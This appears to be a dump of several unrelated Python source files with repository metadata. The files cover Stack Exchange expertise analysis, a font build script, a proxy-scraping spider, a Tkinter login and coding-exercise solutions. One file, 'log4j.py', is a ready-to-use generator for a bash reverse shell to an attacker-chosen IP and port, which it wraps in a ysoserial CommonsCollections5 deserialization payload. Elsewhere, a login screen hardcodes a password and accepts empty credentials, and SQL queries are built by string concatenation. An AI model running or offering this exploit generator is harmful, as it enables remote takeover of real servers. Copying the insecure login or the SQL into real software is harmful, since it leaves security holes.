if qid == None:
continue
if option=='train':
cur.execute("select cuserid, cscore, qtags from sim_cq where qid = "+str(qid)+" and cuserid<>qowneruserid and TO_CHAR (ccreationdate,'YYYY-MM-DD') < '2012-07-01'")
else:
cur.execute("select cuserid, cscore, qtags from sim_cq where qid = "+str(qid)+" and cuserid<>qowneruserid and TO_CHAR (ccreationdate,'YYYY-MM-DD') < '2013-01-01'")
cqresults = cur.fetchall()
if cqresults == None or len(cqresults) ==0:
continue
qtags = []
try:
for t in cqresults[0][2].split('|'):
qtags.append(t)
except:
print cqresults
if len(qtags) == 0:
continue
for cqr in cqresults:
cqscore = cqr[1]
if cqscore == None:
cqscore = 0
cquserid = cqr[0]
for t in qtags:
if (cquserid, t) in at_NoComment_q:
at_NoComment_q[(cquserid, t)] += 1
at_NoCommentVotes_q[(cquserid, t)] += cqscore
else:
at_NoComment_q[(cquserid, t)] = 1
at_NoCommentVotes_q[(cquserid, t)] = cqscore
## add to data structure
mec = []
mec_log = []
mec_naive = []
zscore = []
exp_data_repu = []
exp_data_repu_norm = []
act_data = []
'''for ut in at_NoAnswer:
if ut[0] == None:
continue
exp_data_repu.append((ut[0],ut[1], at_NoVotes[(ut[0],ut[1])]))
exp_data_repu_norm.append((ut[0],ut[1], float(at_NoVotes[(ut[0],ut[1])])/at_NoAnswer[(ut[0],ut[1])]))
act_data.append((ut[0],ut[1], at_NoAnswer[(ut[0],ut[1])]))
for ut in at_MEC_quantities:
if ut[0] == None:
continue
#if ut[0]==616639 and ut[1]=='hacking':
#print at_MEC_quantities[(ut[0],ut[1])]
mec_mec_quantities = at_MEC_quantities[(ut[0],ut[1])]
iranks_naive = [float(1)/r[0] for r in mec_mec_quantities]
iranks = [float(r[1])/r[0] for r in mec_mec_quantities]
iranks_log = [np.log2(r[1])/r[0] for r in mec_mec_quantities]
mec_naive.append((ut[0],ut[1], np.mean(iranks_naive)))
mec.append((ut[0],ut[1], np.mean(iranks)))
mec_log.append((ut[0],ut[1], np.mean(iranks_log)))
#if ut[0]==616639 and ut[1]=='hacking':
#sys.exit(1)'''
parti_act_data = []
parti_exp_data = []
for ut in at_NoComment_a:
if ut[0] == None:
continue
if ut in at_NoComment_q:
parti_act_data.append((ut[0],ut[1], at_NoComment_a[(ut[0],ut[1])]+at_NoComment_q[(ut[0],ut[1])]))
parti_exp_data.append((ut[0],ut[1], at_NoCommentVotes_a[(ut[0],ut[1])]+at_NoCommentVotes_q[(ut[0],ut[1])]))
else:
parti_act_data.append((ut[0],ut[1], at_NoComment_a[(ut[0],ut[1])]))
parti_exp_data.append((ut[0],ut[1], at_NoCommentVotes_a[(ut[0],ut[1])]))
for ut in at_NoComment_q:
if ut[0] == None:
continue
if ut in at_NoComment_a:
continue
parti_act_data.append((ut[0],ut[1], at_NoComment_q[(ut[0],ut[1])]))
parti_exp_data.append((ut[0],ut[1], at_NoCommentVotes_q[(ut[0],ut[1])]))
return exp_data_repu, exp_data_repu_norm, act_data, mec_naive, mec, mec_log, parti_act_data, parti_exp_data
def load_train_data_old(expertise_option='novotes'):
train_data = []
cur.execute("select * from qr_ut_matrix_train")
records = cur.fetchall()
for rc in records:
if rc[2]==0:
continue
if expertise_option=='novotes':
train_data.append((rc[0], rc[1], rc[3]))
return train_data
'''
for each question posted after 2013-01-01:
get the ranked list of answerers
get the tags
'''
def load_test_data(option='na'):
qinfos = []
if option=='train':
cur.execute("select id from questions where TO_CHAR (creationdate,'YYYY-MM-DD') < '2013-01-01' and TO_CHAR (creationdate,'YYYY-MM-DD') >= '2012-07-01'")
else:
cur.execute("select id from questions where TO_CHAR (creationdate,'YYYY-MM-DD') >= '2013-01-01'")
results = cur.fetchall()
for rs in results:
qid = rs[0]
if qid == None:
continue
cur.execute("select aowneruserid, ascore, qtags from sim_qa where qid = "+str(qid))
aresults = cur.fetchall()
if aresults == None or len(aresults) ==0:
continue
qtags = []
try:
for t in aresults[0][2].split('|'):
qtags.append(t)
except:
print aresults
if len(qtags) == 0:
continue
qrank = []
for ar in aresults:
qrank.append([ar[0], ar[1]])
qrank = sorted(qrank, key = lambda qrank : qrank[1], reverse=True)
qinfo = []
qinfo.append(qid)
qinfo.append(qtags)
qinfo.append(qrank)
qinfos.append(qinfo)
return qinfos
def check_date_(qid, date):
cur.execute("select qid from sim_qa where qid="+str(qid)+" and TO_CHAR(acreationdate,'YYYY-MM-DD') <'" + date +"'")
result = cur.fetchone()
if result == None:
return False
else:
return True
def data_filter_single(exp_data, act_data, test_data):
train_u = set([r[0] for r in exp_data])
print '#answerers in Training data: '+str(len(train_u))
test_u = set([u[0] for qi in test_data for u in qi[2]])
print '#answerers in Test data: '+str(len(test_u))
intersect_u = train_u.intersection(test_u)
print '#answerers in both sets: '+str(len(intersect_u))
exp_data_new = []
act_data_new = []
test_data_new = []
for r in exp_data:
if r[0] in intersect_u:
exp_data_new.append(r)
del exp_data
for r in act_data:
if r[0] in intersect_u:
act_data_new.append(r)
del act_data
for r in test_data:
r_new = copy.deepcopy(r)
for us in r[2]:
if us[0] not in intersect_u:
r_new[2].remove(us)
if len(r_new[2])>=2:
test_data_new.append(r_new)
del test_data
#print test_data_new
print 'AFTER the first filtering: removing the answerers not in the intersection of the two sets; delete questions<2 answerers in the test set.'
train_u = set([r[0] for r in exp_data_new])
print '#answerers in Training data: '+str(len(train_u))
test_u = set([u[0] for qi in test_data_new for u in qi[2]])
print '#answerers in Test data: '+str(len(test_u))
intersect_u = train_u.intersection(test_u)
print '#answerers in both sets: '+str(len(intersect_u))
exp_data = []
act_data = []
test_data = []
for r in exp_data_new:
if r[0] in intersect_u:
exp_data.append(r)
del exp_data_new
for r in act_data_new:
if r[0] in intersect_u:
act_data.append(r)
del act_data_new
test_data = test_data_new
del test_data_new
print 'remaining test questions: '+str(len(test_data))
print 'AFTER the second filtering: remove again the answerers in the training set, who do not show up in the test set.'
train_u = set([r[0] for r in exp_data])
print '#answerers in Training data: '+str(len(train_u))
test_u = set([u[0] for qi in test_data for u in qi[2]])
print '#answerers in Test data: '+str(len(test_u))
intersect_u = train_u.intersection(test_u)
print '#answerers in both sets: '+str(len(intersect_u))
return exp_data,act_data, test_data
def data_filter(exp_data_all, exp_data, act_data, test_data, exp_data_mec_naive, exp_data_mec, exp_data_mec_log):
train_u = set([r[0] for r in exp_data])
print '#answerers in Training data: '+str(len(train_u))
test_u = set([u[0] for qi in test_data for u in qi[2]])
print '#answerers in Test data: '+str(len(test_u))
intersect_u = train_u.intersection(test_u)
print '#answerers in both sets: '+str(len(intersect_u))
exp_data_mec_new = []
exp_data_mec_naive_new = []
exp_data_mec_log_new = []
exp_data_new = []
exp_data_all_new = []
act_data_new = []
test_data_new = []
for r in exp_data_mec:
if r[0] in intersect_u:
exp_data_mec_new.append(r)
del exp_data_mec
for r in exp_data_mec_naive:
if r[0] in intersect_u:
exp_data_mec_naive_new.append(r)
del exp_data_mec_naive
for r in exp_data_mec_log:
if r[0] in intersect_u:
exp_data_mec_log_new.append(r)
del exp_data_mec_log
for r in exp_data:
if r[0] in intersect_u:
exp_data_new.append(r)
del exp_data
for r in exp_data_all:
if r[0] in intersect_u:
exp_data_all_new.append(r)
del exp_data_all
for r in act_data:
if r[0] in intersect_u:
act_data_new.append(r)
del act_data
for r in test_data:
r_new = copy.deepcopy(r)
for us in r[2]:
if us[0] not in intersect_u:
r_new[2].remove(us)
if len(r_new[2])>=2:
test_data_new.append(r_new)
del test_data
#print test_data_new
print 'AFTER the first filtering: removing the answerers not in the intersection of the two sets; delete questions<2 answerers in the test set.'
train_u = set([r[0] for r in exp_data_new])
print '#answerers in Training data: '+str(len(train_u))
test_u = set([u[0] for qi in test_data_new for u in qi[2]])
print '#answerers in Test data: '+str(len(test_u))
intersect_u = train_u.intersection(test_u)
print '#answerers in both sets: '+str(len(intersect_u))
exp_data_mec = []
exp_data_mec_naive = []
exp_data_mec_log = []
exp_data = []
exp_data_all = []
act_data = []
test_data = []
for r in exp_data_mec_new:
if r[0] in intersect_u:
exp_data_mec.append(r)
del exp_data_mec_new
for r in exp_data_mec_naive_new:
if r[0] in intersect_u:
exp_data_mec_naive.append(r)
del exp_data_mec_naive_new
for r in exp_data_mec_log_new:
if r[0] in intersect_u:
exp_data_mec_log.append(r)
del exp_data_mec_log_new
for r in exp_data_new:
if r[0] in intersect_u:
exp_data.append(r)
del exp_data_new
for r in exp_data_all_new:
if r[0] in intersect_u:
exp_data_all.append(r)
del exp_data_all_new
for r in act_data_new:
if r[0] in intersect_u:
act_data.append(r)
del act_data_new
test_data = test_data_new
del test_data_new
print 'remaining test questions: '+str(len(test_data))
print 'AFTER the second filtering: remove again the answerers in the training set, who do not show up in the test set.'
train_u = set([r[0] for r in exp_data])
print '#answerers in Training data: '+str(len(train_u))
test_u = set([u[0] for qi in test_data for u in qi[2]])
print '#answerers in Test data: '+str(len(test_u))
intersect_u = train_u.intersection(test_u)
print '#answerers in both sets: '+str(len(intersect_u))
return exp_data_all, exp_data,act_data, test_data, exp_data_mec_naive, exp_data_mec, exp_data_mec_log
if __name__ == '__main__':
exp_data=[(1,'c#',10),(2,'c#',5),(3,'java',1),(5,'java',1),(6,'java',2)]
act_data=[(1,'c#',1),(2,'c#',2),(3,'java',1),(5,'java',1)]
test_data = [[1,'c#',[[6,2],[4,1],[9,1],[10,1]]],[2,'c#',[[1,2],[4,1],[3,1]]]]
exp_data,act_data,test_data = data_filter(exp_data,act_data,test_data)
print exp_data
print test_data | [
"yangjiera@gmail.com"
] | yangjiera@gmail.com |
d7dd88ecf67ac7b20922fbc9779a463ad3cd8297 | a6610e191090e216b0e0f23018cecc5181400a7a | /robotframework-ls/src/robotframework_ls/constants.py | c6291b1baf57cfc01ddad6b1554e8002b7fe2a95 | [
"Apache-2.0"
] | permissive | JohanMabille/robotframework-lsp | d7c4c00157dd7c12ab15b7125691f7052f77427c | 610f0257fdcd79b8c38107a0ecf600f60160bc1f | refs/heads/master | 2023-01-19T10:29:48.982578 | 2020-11-25T13:46:22 | 2020-11-25T13:46:22 | 296,245,093 | 0 | 0 | NOASSERTION | 2020-09-17T06:58:54 | 2020-09-17T06:58:53 | null | UTF-8 | Python | false | false | 74 | py | from robocorp_ls_core.constants import *
DEFAULT_COMPLETIONS_TIMEOUT = 4
| [
"fabiofz@gmail.com"
] | fabiofz@gmail.com |
28d4e8968c3ade8c5ecaaed6f28d428d6364b196 | f97441152ad92e6910646a978b047001044160d9 | /beam_energy_norm_classic/mor.py | 931d2bb945a7a2b621335797459840ac54d1fcf6 | [] | no_license | babakmaboudi/shared_projects | 59f284888481655d321295b4b9f2cc5cc58635af | ceb5fe7f77103cde0fc7d56747c59f43252f2d00 | refs/heads/master | 2021-01-21T10:13:41.982448 | 2019-02-27T15:27:02 | 2019-02-27T15:27:02 | 91,682,959 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,385 | py | import numpy as np
import matplotlib.pyplot as plt
class Mor:
def __init__( self ):
self.snap_Q = np.load("snap_Q.dat")
self.snap_P = np.load("snap_P.dat")
self.X = np.load("X_mat.dat")
# self.X = np.load("X_mat_eye.dat")
def set_basis_size(self,k):
self.rb_size = k
def POD_energy(self):
snaps = np.append(self.snap_Q,self.snap_P,0)
snaps = self.X*snaps;
U,s,V = np.linalg.svd(snaps, full_matrices=True)
# plt.semilogy(s)
# plt.show()
self.RB = np.linalg.inv(self.X)*U[:,0:self.rb_size]
# snaps = np.append(self.snap_Q,self.snap_P,0)
# temp = self.X*snaps - self.X*RB*np.transpose(RB)*self.X*self.X*snaps
# for i in range(0,snaps.shape[1]):
# temp = self.X*snaps[:,i] - self.X*self.RB*np.transpose(self.RB)*self.X*self.X*snaps[:,i]
# print( np.linalg.norm(snaps[:,i]) )
def PSD(self):
snaps = np.append(self.snap_Q,self.snap_P,1)
U,s,V = np.linalg.svd(snaps, full_matrices=True)
# plt.semilogy(s)
# plt.show()
self.RB = U[:,0:self.rb_size]
def initiate_greedy(self):
self.N = self.snap_Q.shape[0]
self.ns = self.snap_Q.shape[1]
self.Jn = np.zeros([2*self.N,2*self.N])
for i in range(0,self.N):
self.Jn[i,self.N+i] = 1
self.Jn[self.N+i,i] = -1
# self.X = np.load("X_mat.dat")
def construct_Jk(self,K):
self.K = K
self.Jk = np.zeros([2*self.K,2*self.K])
for i in range(0,self.K):
self.Jk[i,self.K+i] = 1
self.Jk[self.K+i,i] = -1
def symplectic_proj(self):
temp = np.dot( np.transpose(self.Jk) , np.transpose(self.A) )
self.A_plus = np.dot(temp,self.Jn)
self.P = np.dot(self.A,self.A_plus)
def greedy(self,MAX_ITER):
idx = np.random.random_sample(500)
idx = idx*self.ns
idx = np.floor(idx)
idx = np.squeeze(np.asarray(idx))
idx = idx.astype(int)
snaps = np.append(self.snap_Q,self.snap_P,0)
snaps = snaps[:,idx]
ns = 500
E = np.matrix(snaps[:,1]).reshape([2*self.N,1])
E = E/np.linalg.norm(E)
F = np.dot(np.transpose(self.Jn),E)
K = 1
for it in range(0,MAX_ITER):
er = np.zeros(self.ns)
for i in range(0,ns):
self.A = np.append(E,F,1)
self.construct_Jk(K)
self.symplectic_proj()
vec = np.matrix(snaps[:,i]).reshape(2*self.N,1)
er[i] = self.porj_error(vec)
max_idx = np.argmax(er)
print( [ it , er[max_idx] ] )
vec = np.matrix(snaps[:,max_idx]).reshape(2*self.N,1)
vec = self.symplectic_QR(vec,E,F)
vec = self.symplectic_QR(vec,E,F)
E = np.append(E,vec,1)
temp = np.dot( np.transpose(self.Jn) , vec )
F = np.append( F , temp , 1 )
K += 1
self.RB = np.concatenate( (E,F),1 )
print(self.RB.shape)
def greedy_energy(self,MAX_ITER):
idx = np.random.random_sample(500)
idx = idx*self.ns
idx = np.floor(idx)
idx = np.squeeze(np.asarray(idx))
idx = idx.astype(int)
snaps = np.append(self.snap_Q,self.snap_P,0)
snaps = snaps[:,idx]
snaps = np.matrix(snaps)
# self.X = np.matrix(self.X)
# snaps = self.X*snaps
ns = 500
E = np.matrix(snaps[:,1]).reshape([2*self.N,1])
E = E/np.linalg.norm(E)
F = np.dot(np.transpose(self.Jn),E)
K = 1
for it in range(0,MAX_ITER):
er = np.zeros(self.ns)
for i in range(0,ns):
self.A = np.append(E,F,1)
self.construct_Jk(K)
self.symplectic_proj()
vec = np.matrix(snaps[:,i]).reshape(2*self.N,1)
er[i] = self.porj_error(vec)
max_idx = np.argmax(er)
print( [ it , er[max_idx] ] )
vec = np.matrix(snaps[:,max_idx]).reshape(2*self.N,1)
vec = self.symplectic_QR(vec,E,F)
vec = self.symplectic_QR(vec,E,F)
E = np.append(E,vec,1)
temp = np.dot( np.transpose(self.Jn) , vec )
F = np.append( F , temp , 1 )
K += 1
# E = np.linalg.inv(self.X)*E
# F = np.transpose(self.Jn)*E
self.RB = np.concatenate( (E,F),1 )
# temp = np.transpose( self.RB )*self.Jn*self.RB
# print(temp)
def porj_error(self,vec):
return np.linalg.norm( vec - np.dot(self.P,vec) )
def symplectic_QR(self,v,E,F):
vec = v
for i in range(E.shape[1]):
e = np.matrix(E[:,i]).reshape([2*self.N,1])
f = np.matrix(F[:,i]).reshape([2*self.N,1])
vec = self.J2_orthogonalize(vec,e,f)
vec = vec/np.linalg.norm(vec)
return vec
def J2_orthogonalize(self,v,e,f):
temp = np.dot(-np.transpose( v ),self.Jn)
alpha = np.dot(temp,f)
temp = np.dot(np.transpose( v ),self.Jn)
beta = np.dot(temp,e)
res = v + alpha[0,0]*e + beta[0,0]*f
return res
def save_basis(self):
self.RB.dump("RB.dat")
| [
"babak.maboudi@gmail.com"
] | babak.maboudi@gmail.com |
63d89643b7725000994b68b096f4066c0cdc2c7e | 2bdab4847a02879af352ba183ab81761c4d2eb48 | /tools/build.py | 488efa01d795610763160e30f9b01f0b56868db0 | [] | no_license | foxoman/amiri-typewriter | 5f20f965d1179e1eb58cfdb66cd1da9989f9a8c0 | 89e3c3e4715ce6c5123ef442069f87c71cb231b3 | refs/heads/master | 2021-01-01T19:07:49.924088 | 2017-07-21T23:10:54 | 2017-07-21T23:10:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,050 | py | #!/usr/bin/env python2
# encoding: utf-8
from __future__ import division
import argparse
import math
from datetime import datetime
from sortsmill import ffcompat as fontforge
def zeromarks(font):
"""Since this is a fixed width font, we make all glyphs the same width (which allows
us to set isFixedPitch bit in the post table, that some application rely on
to identify fixed width fonts). Compliant layout engines will zero the mark
width when combined, so this is not an issue, but some non-compliant
engines like Core Text don’t do this and break the font, so we will zero
the width ourselves here to workaround this."""
langsystems = set()
for lookup in font.gpos_lookups:
for feature in font.getLookupInfo(lookup)[2]:
for langsys in feature[1]:
script = langsys[0]
for language in langsys[1]:
langsystems.add((script, language))
fea = ""
for script, language in langsystems:
fea += "languagesystem %s %s;" % (script, language)
fea += "feature mark {"
for glyph in font.glyphs():
if glyph.glyphclass == "mark":
fea += "pos %s -%d;" % (glyph.glyphname, glyph.width)
fea += "} mark;"
font.mergeFeatureString(fea)
def merge(args):
arabic = fontforge.open(args.arabicfile)
arabic.encoding = "Unicode"
arabic.mergeFeature(args.feature_file)
latin = fontforge.open(args.latinfile)
latin.encoding = "Unicode"
scale = arabic["arAlef.isol"].width / latin["space"].width
latin.em = int(math.ceil(scale * latin.em))
latin_locl = ""
for glyph in latin.glyphs():
if glyph.glyphclass == "mark":
glyph.width = latin["A"].width
if glyph.color == 0xff0000:
latin.removeGlyph(glyph)
else:
if glyph.glyphname in arabic:
name = glyph.glyphname
glyph.unicode = -1
glyph.glyphname = name + ".latin"
if not latin_locl:
latin_locl = "feature locl {lookupflag IgnoreMarks; script latn;"
latin_locl += "sub %s by %s;" % (name, glyph.glyphname)
arabic.mergeFonts(latin)
if latin_locl:
latin_locl += "} locl;"
arabic.mergeFeatureString(latin_locl)
zeromarks(arabic)
# Set metadata
arabic.version = args.version
copyright = 'Copyright © 2015-%s The Amiri Typewriter Project Authors, with Reserved Font Name "Fira".' % datetime.now().year
arabic.copyright = copyright.replace("©", "(c)")
en = "English (US)"
arabic.appendSFNTName(en, "Copyright", copyright)
arabic.appendSFNTName(en, "Designer", "Khaled Hosny")
arabic.appendSFNTName(en, "License URL", "http://scripts.sil.org/OFL")
arabic.appendSFNTName(en, "License", 'This Font Software is licensed under the SIL Open Font License, Version 1.1. This license is available with a FAQ at: http://scripts.sil.org/OFL')
arabic.appendSFNTName(en, "Descriptor", "Amiri Typewriter is an Arabic monospaced font family inspired by the type of mechanical Arabic typewriters.")
arabic.appendSFNTName(en, "Sample Text", "الخط هندسة روحانية ظهرت بآلة جسمانية")
return arabic
def main():
parser = argparse.ArgumentParser(description="Create a version of Amiri with colored marks using COLR/CPAL tables.")
parser.add_argument("arabicfile", metavar="FILE", help="input font to process")
parser.add_argument("latinfile", metavar="FILE", help="input font to process")
parser.add_argument("--out-file", metavar="FILE", help="output font to write", required=True)
parser.add_argument("--feature-file", metavar="FILE", help="output font to write", required=True)
parser.add_argument("--version", metavar="version", help="version number", required=True)
args = parser.parse_args()
font = merge(args)
flags = ["round", "opentype", "no-mac-names"]
font.generate(args.out_file, flags=flags)
if __name__ == "__main__":
main()
| [
"khaledhosny@eglug.org"
] | khaledhosny@eglug.org |
65bbcaa81382c14af30276de4d3df87f8de28291 | 693d6d64877311a6a9f21a82b551599a3b540410 | /Lab10/lab10.py | 0b87c4ee2ceab777c4c6619f9cb9b945cf80ee8b | [] | no_license | dalbyryan3/me-en-4650-tfes-lab | e01a0d8ae76897e01d03d95c72e3e470adfd7c3d | 0377cd8bae3af443a800225581a81ff5bc1e6c60 | refs/heads/main | 2023-08-14T13:07:15.475498 | 2021-09-24T05:01:40 | 2021-09-24T05:01:40 | 409,836,915 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,777 | py | # %%
# ME EN 4650 Lab10:Heat Exchanger Lab Ryan Dalby
import numpy as np
from numpy import random
import pandas as pd
import matplotlib.pyplot as plt
from pathlib import Path
from pandas.plotting import table
import os
import matlab.engine # Must install from matlab installation direcotry using: cd "matlabroot\extern\engines\python" && python setup.py install
# %%
# Define useful functions
mmhg_to_pa = lambda mmhg : mmhg*133.3 # Lambda function to covert mmHg to Pa
inh2o_to_pa = lambda inh2o : inh2o*249.04 # Lambda function to covert inH20 to Pa
in_to_m = lambda inch : inch*0.0254 # Lambda function to convert in to m
cm_to_m = lambda cm : cm/100 # Lambda function to convert cm to m
mm_to_m = lambda mm : mm/1000 # Lambda function to convert mm to m
degCToK = lambda degC : degC+273.15 # Lambda function to covert degC to K
# Generate EffectivenessNTU figure
# Plot effectiveness versus NTU and Cr for crossflow heat exchanger
Cr=np.array([0,.25,.5,.75])
NTU=np.linspace(0,1,100)
e=np.zeros((100,5))
plt.figure(figsize=(10,5))
plt.minorticks_on()
plt.grid(b=True, which='major', axis='both', linestyle='-')
plt.grid(b=True, which='minor', axis='both', linestyle='--')
plt.xlim((0,1))
plt.ylim((0,0.7))
plt.title('Effectiveness versus NTU for a crossflow heat exchanger', fontsize=16)
plt.xlabel('NTU', fontsize=16)
plt.ylabel('$\epsilon$', fontsize=16)
for k in range(Cr.size):
e[:,k]=(1-np.exp(-NTU*(1-Cr[k])))/(1-Cr[k]*np.exp(-NTU*(1-Cr[k])))
plt.plot(NTU,e[:,k],'k-')
plt.text(NTU[-1]*1.02,e[-1,k]*.98,str(Cr[k]), fontsize=16)
k=k+1
e[:,k]=NTU/(1+NTU)
plt.plot(NTU,e[:,k],'k-')
plt.text(NTU[-1]*1.02,e[-1,k]*.98,'1', fontsize=16)
plt.text(NTU[-1]*1.02,e[-1,1]*1.11,'$C_r$', fontsize=16)
plt.show() | [
"dalbyryan3@gmail.com"
] | dalbyryan3@gmail.com |
b30f1b39fb3a2a1a6d9299203f6c492cd0e9aa87 | a7ca0a372a44bc9cee59a7e1e59734a4814a59b9 | /이것이코딩테스트다/병사배치하기.py | 8b38d29927c9fad4814ed5bac88c39daec9c4d28 | [] | no_license | schw240/Preparing-coding-test | 435d6dbdcf90fc8c0c408dfa032ad7f09fdc5a90 | 758a41270c409312a998152c5298369ec385bfdb | refs/heads/master | 2021-11-29T07:54:05.140178 | 2021-10-03T11:40:36 | 2021-10-03T11:40:36 | 245,345,693 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | N = int(input())
scores = list(map(int, input().split(' ')))
scores.reverse()
# 병사를 배치할 때 전투력이 높은 병사가 앞으로 오도록 내림차순 배치
# 이때 정렬을 쓰는게 아니라 열외를 쓰는 방법으로 배치
dp = [1] * N
# 남아있는 병사의 수가 최대가 되도록 하기 위해 열외시켜야 하는 병사의 수
for i in range(1, N):
for j in range(i):
if scores[j] < scores[i]:
dp[i] = max(dp[i], dp[j] + 1)
print(N - max(dp))
| [
"schw240@gmail.com"
] | schw240@gmail.com |
eb440733e5de667ecb21c9860f15bbc52c7d7366 | f773c3b31707bedd58f800c2ae2c4fd9504460cf | /ScrapyDemo/ScrapyDemo/spiders/XiCiDaiLiSpider.py | 5d77a4688a36e3112222b49df5b6bad8b42e18a5 | [] | no_license | Cat7373/ScrapyDemo | 30a4a2b66d8cea858d51ddaa2e15cc7373897408 | 87a93478afc6002d03464a7d1535697ac4726818 | refs/heads/master | 2020-05-16T15:43:51.183233 | 2017-06-22T04:40:47 | 2017-06-22T04:40:47 | 183,141,268 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import scrapy
from scrapy import Request
from ..items import Proxy
class XiCiDaiLiSpider(scrapy.Spider):
"""
自动爬取 xicidaili.com 的代理
"""
# 代理名称
name = 'XiCiDaiLiSpider'
# 网站的根地址
host = 'http://www.xicidaili.com'
# 允许爬虫爬取的域列表
allowed_domains = ['www.xicidaili.com']
# 种子站点列表
start_urls = [
'http://www.xicidaili.com/wn/',
'http://www.xicidaili.com/wt/',
'http://www.xicidaili.com/qq/'
]
# 将种子站点加入爬取队列
def start_requests(self):
for url in self.start_urls:
yield Request(url=url, callback=self.parse_proxy)
# 爬每一页的代理,并将每一个代理投递给 items pipe
def parse_proxy(self, response):
# 找出代理列表
proxys = response.css('#ip_list tr')[1:]
for proxy in proxys:
attrs = proxy.css('td')
proxy = Proxy(
ip=attrs[1].css('::text').extract_first(),
port=attrs[2].css('::text').extract_first(),
anonymity=attrs[4].css('::text').extract_first(),
type=attrs[5].css('::text').extract_first(),
location=attrs[3].css('a::text').extract_first()
)
if proxy['type'] == u'QQ代理':
proxy['type'] = 'SOCKET5'
yield proxy
# 找下一页
next = response.css('.next_page')
if len(next) > 0:
href = next.css('::attr(href)').extract_first()
yield Request(url=self.host + href, callback=self.parse_proxy)
| [
"cat73@cat73.org"
] | cat73@cat73.org |
6e4897a69468c53e347c54d03532fa30233fa3d1 | a2f16f2c29474a10ab87996185b4c459c48f2e93 | /login.py | 04689cf1142e9bde76233abf0b03899b72ee1326 | [] | no_license | Karmi-Makadia/Hostel-management-system | cc4788165c01d2d21f56b7e9ccea3515e0f1fd02 | 6803df642ff4cd3d93949231a115f8cd56cbf127 | refs/heads/main | 2023-06-04T14:30:41.568270 | 2021-06-25T09:13:47 | 2021-06-25T09:13:47 | 380,185,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | import tkinter as tk
from tkinter import *
from tkinter import ttk
from hostel import *
class login:
u='root'
p='qwerty1234'
def __init__(self,rt):
self.rt=rt
self.rt.geometry('500x500')
self.rt.title("Login Page")
frame= LabelFrame(self.rt,width=200,bd=5,height=200)
frame.pack(side=TOP,fill=BOTH,expand=TRUE)
Label1=tk.Label(frame, text='Username:')
Label2=tk.Label(frame, text='Password:')
self.f1=tk.Entry(frame)
self.f2=tk.Entry(frame,show='*')
b1=Button(frame,text="Login",width=6,command=self.login_user)
Label1.place(anchor=CENTER,relx=0.4,rely=0.25)
Label2.place(anchor=CENTER,relx=0.4,rely=0.5)
self.f1.place(anchor=CENTER,relx=0.6,rely=0.25)
self.f2.place(anchor=CENTER,relx=0.6,rely=0.5)
b1.place(anchor=CENTER,relx=0.5,rely=0.75)
def login_user(self):
if (self.f1.get() == self.u and self.f2.get() == self.p) or (self.f1.get() == '' and self.f2.get() == ''):
rt.destroy()
nrt = tk.Tk()
obj = hostels(nrt)
nrt.mainloop()
else:
print('login nahi ho gaya')
rt=tk.Tk()
rt.geometry("200x200")
obj= login(rt)
rt.mainloop() | [
"noreply@github.com"
] | Karmi-Makadia.noreply@github.com |
708ada4d0f94700d42c94e96b325d3809207ea80 | af7e99aad75dcf48332e9ed1119d4d385ffcb685 | /log4j.py | e1bf14c49cfea8950700c9e1737f9dd3ae9a7845 | [] | no_license | god0304/log4j | a0c22ff15b8c844b1b1b8b18155659d4a7b2a886 | 180796b5d1d38581d7a5fc14a50cc10b0d414f68 | refs/heads/master | 2022-11-08T18:14:38.775526 | 2020-07-02T15:02:24 | 2020-07-02T15:02:24 | 276,675,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py | #usage:
#python log4j ip port
#IP为主机IP
#port为监听的端口
#须将该文件与ysoserial-master.jar放在同一文件夹下执行
import os
import base64
import sys
ip = sys.argv[1]
port = sys.argv[2]
test = 'bash -i>& /dev/tcp/%s/%s 0>&1'%(ip,port)
test_base64 = base64.b64encode(test)
payload = 'bash -c {echo,'+test_base64+'}|{base64,-d}|{bash,-i}'
cmd = 'java -jar ysoserial-master.jar CommonsCollections5 \''+payload+'\' > exp.bin'
os.system(cmd)
| [
"noreply@github.com"
] | god0304.noreply@github.com |
a499b9a33ae73e6261dc5b49dd07438ca76ae38c | 0217412414848aa75031fabe17053a1b64577d66 | /Easy/235_easy_lowest-common-ancestor-of-a-binary-search-tree.py | 0be1b5930417732c1cd79c21d84b93f57fc3ef61 | [] | no_license | sarahgonsalves223/DSA_Python | b164e7118f1ba6463b2dfb4ce20a407fd26172b2 | 8e116c21f91c87a9dc8526d8be93c443e79469bf | refs/heads/master | 2020-07-05T00:50:43.743785 | 2019-11-21T01:26:06 | 2019-11-21T01:26:06 | 202,474,629 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | #
# @lc app=leetcode id=235 lang=python
#
# [235] Lowest Common Ancestor of a Binary Search Tree
#
# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-search-tree/description/
#
# algorithms
# Easy (45.72%)
# Total Accepted: 302.8K
# Total Submissions: 662.4K
# Testcase Example: '[6,2,8,0,4,7,9,null,null,3,5]\n2\n8'
#
# Given a binary search tree (BST), find the lowest common ancestor (LCA) of
# two given nodes in the BST.
#
# According to the definition of LCA on Wikipedia: “The lowest common ancestor
# is defined between two nodes p and q as the lowest node in T that has both p
# and q as descendants (where we allow a node to be a descendant of itself).”
#
# Given binary search tree: root = [6,2,8,0,4,7,9,null,null,3,5]
#
#
#
# Example 1:
#
#
# Input: root = [6,2,8,0,4,7,9,null,null,3,5], p = 2, q = 8
# Output: 6
# Explanation: The LCA of nodes 2 and 8 is 6.
#
#
# Example 2:
#
#
# Input: root = [6,2,8,0,4,7,9,null,null,3,5], p = 2, q = 4
# Output: 2
# Explanation: The LCA of nodes 2 and 4 is 2, since a node can be a descendant
# of itself according to the LCA definition.
#
#
#
#
# Note:
#
#
# All of the nodes' values will be unique.
# p and q are different and both values will exist in the BST.
#
#
#
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def lowestCommonAncestor(self, root, p, q):
"""
:type root: TreeNode
:type p: TreeNode
:type q: TreeNode
:rtype: TreeNode
"""
if root.val == p.val:
return p
if root.val == q.val:
return q
if p.val < root.val and q.val < root.val:
return self.lowestCommonAncestor(root.left, p, q)
